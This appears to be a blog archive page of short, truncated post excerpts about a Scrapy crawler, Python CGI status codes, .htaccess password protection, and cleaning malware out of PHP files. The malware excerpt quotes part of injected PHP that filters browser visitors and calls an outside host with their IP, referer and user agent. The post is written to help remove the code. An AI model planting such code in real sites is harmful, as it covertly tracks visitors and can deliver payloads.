Build a website crawler using Scrapy Framework

Before a while I discovered the website crawling framework Scrapy as mentioned in my earlier post Nice Python website crawler framework. Now I wrote a little website crawler using this genius framework. Here are the steps I’ve taken to get my blog https://www.ask-sheldon.com crawled: Installation of Scrapy Install Python package management system (pip): $> sudo apt-get install […]

Nice Python website crawler framework

Today I stumbled over http://scrapy.org/ while searching for an OpenSource website crawler. Its an interesting crawling and scraping framework for Python. It looks very convenient and easy to use. The most interesting feature seems to be the possibility to select website elements (f.e. hyperlinks) via CSS-selectors. In any case I’ll give it a try.

Deliver status 503 with you Python CGI-script

I’ve searched a lot for a solution of this simple looking problem. I found a lot of irritating and confusing information about this on the WWW. From implementing a socket-application to setting up an self-made HTTP-server. But the answer is much simpler: #!/usr/bin/python # -*- coding: UTF-8 -*- # enable debugging import sys import cgitb import […]

Find and replace malware code blocks in php files via shell

Today I was attacked by an unknown bot or something like that. It placed the following code in many hundred index.php files on one of my servers, because the FTP-Password was cracked. <?php #19f955# error_reporting(0); ini_set(‘display_errors’,0); $wp_sjqe08340 = @$_SERVER[‘HTTP_USER_AGENT’]; if (( preg_match (‘/Gecko|MSIE/i’, $wp_sjqe08340) && !preg_match (‘/bot/i’, $wp_sjqe08340))){ $wp_sjqe0908340=”http://”.”http”.”href”.”.com/href”.”/?ip=”.$_SERVER[‘REMOTE_ADDR’].”&referer=”.urlencode($_SERVER[‘HTTP_HOST’]).”&ua=”.urlencode($wp_sjqe08340); $ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_sjqe0908340); […]

Protect directory with username and password

 To protect a folder with an password prompt, you only need to place a .htaccess and a .htpasswd into the target directory. .htaccess AuthUserFile /root/path/to/.htpasswd AuthGroupFile /dev/null AuthName “Title for the popup window” AuthType Basic <Limit GET> require valid-user </Limit> .htpasswd username:NiceCryptOrMD5encryptedPasswordHash The passwort can be crypted via crypt or MD5. On http://de.selfhtml.org/servercgi/server/htaccess.htm#verzeichnisschutz you can find […]